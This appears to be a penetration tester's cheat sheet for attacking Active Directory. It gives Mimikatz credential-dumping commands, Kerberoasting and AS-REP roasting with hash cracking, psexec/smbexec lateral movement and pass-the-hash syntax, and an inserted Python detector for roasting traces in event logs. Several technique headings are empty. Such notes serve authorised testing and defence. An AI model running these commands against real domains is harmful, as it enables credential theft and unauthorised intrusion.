Active Directory
When testing Active Directory, our goals should be to:
gain a foothold on a machine on the domain and elevate our privileges
enumerate the domain to find additional accounts, users, etc. that ideally increase our privilege level on the domain
gain access to the domain controller
persist on the domain (situation dependent)
Assuming that we've already enumerated the domain, we should now be focused on gathering credentials to move laterally within the domain.
Cached credential retrieval
Once you have local admin privileges on a domain-joined computer, you can dump the credentials stored in LSASS and the SAM database.
Mimikatz
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords (dump lsass)
lsadump::sam (dump sam database)
sekurlsa::tickets (to dump tickets stored in memory)
kerberos::list (view cached kerberos tickets for the current user)
Attacks
Kerberoasting
If we find interesting service accounts while enumerating, we can export their Kerberos 5 TGS-REP etype 23 (RC4-HMAC) hashes for offline cracking.
Extracting SPN hashes
crackmapexec ldap $ldapIPaddress -u user -p pass --kerberoasting output.txt
kerberos::list /export
Crack
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
hashcat -m 13100 hash.txt /path/to/wordlist -o output.txt
Alternatively, we can use Invoke-Kerberoast.ps1 to enumerate SPNs, request tickets, and export them in a format ready for cracking.
AS-REP Roasting
The AS-REP roasting attack attempts to retrieve the Kerberos hash of users that don't require Kerberos pre-authentication.
Searching for AS-REP Roastable users
crackmapexec ldap $ldapIPaddress -u user -p 'pass' --asreproast output.txt
GetNPUsers.py domain/user:pass -dc-ip ipaddress -request -format john -outputfile output.txt
Crack
john --format=krb5asrep output.txt
hashcat -m 18200 hash.txt /path/to/wordlist -o output.txt
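A defender-side counterpart to the two roasting sections above, added here as an example and not part of the original notes: it runs over a handful of constructed Security-log records (field names taken from events 4769 and 4768; the values are made up) and flags the traces these techniques leave, namely RC4 (etype 0x17) service tickets issued to one account for several distinct service accounts, and TGTs issued with pre-authentication type 0.

```python
from collections import defaultdict

# Constructed sample records modelled on Windows Security events 4769 (TGS
# request) and 4768 (TGT request). Names and values are invented for this example.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12", "Status": "0x0"},   # AES ticket to a computer account: normal
    {"EventID": 4768, "TargetUserName": "svc_legacy", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "PreAuthType": "0", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "carol", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "PreAuthType": "2", "Status": "0x0"},
]

RC4_HMAC = "0x17"  # etype 23, the encryption type the hashcat modes above crack


def find_kerberoast_candidates(events, min_distinct_spns=3):
    """Accounts that were issued RC4 service tickets for several distinct
    non-computer service accounts. Only successful issuances (Status 0x0) count;
    computer accounts (trailing $) and krbtgt are skipped as they are not the
    usual Kerberoasting target. Returns {requester: sorted service names}."""
    spns_by_requester = defaultdict(set)
    for e in events:
        if e.get("EventID") != 4769 or e.get("Status") != "0x0":
            continue
        if e.get("TicketEncryptionType") != RC4_HMAC:
            continue
        svc = e.get("ServiceName", "")
        if svc.endswith("$") or svc == "krbtgt":
            continue
        spns_by_requester[e["TargetUserName"]].add(svc)
    return {u: sorted(s) for u, s in spns_by_requester.items() if len(s) >= min_distinct_spns}


def find_asrep_roast_candidates(events):
    """Accounts issued a TGT without pre-authentication (PreAuthType 0) and with
    an RC4-encrypted response: the material an AS-REP roast feeds to hashcat -m 18200."""
    return sorted({e["TargetUserName"] for e in events
                   if e.get("EventID") == 4768 and e.get("PreAuthType") == "0"
                   and e.get("TicketEncryptionType") == RC4_HMAC and e.get("Status") == "0x0"})
```

In a domain where service accounts hold AES keys, RC4 tickets should be rare, so the etype check alone is a strong signal; raise min_distinct_spns where a few service accounts are legitimately queried together.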
Unconstrained delegation
Constrained delegation
DCSync
Lateral movement
Moving laterally within a domain is fairly straightforward once you have credentials.
Windows remote management
winrs -remote:hostname -u:username -p:password (command)
PS-Remoting
PS-EXEC
psexec.py domain/user:password@ipaddress
SMB-EXEC
smbexec.py username:password@ipaddress
Pass the hash
Pass the hash allows attackers to authenticate to a remote system using an NTLM hash.
Passing-the-hash Toolkit
pth-winexe -U Administrator%$LMHash:$NTLMHash //$ipaddress cmd
Mimikatz
privilege::debug
sekurlsa::pth /user:Administrator /domain:test.local /ntlm:$hash
SMBclient
smbclient.py -hashes LMHash:NTLMHash domain/user@$ipaddress
PS Exec
psexec.py -hashes :NTLMhash administrator@ipaddress
Overpass the hash
The overpass the hash technique uses the NTLM hash to obtain a Kerberos ticket, so that subsequent authentication happens over Kerberos rather than NTLM.
Pass the ticket
Persistence
Golden tickets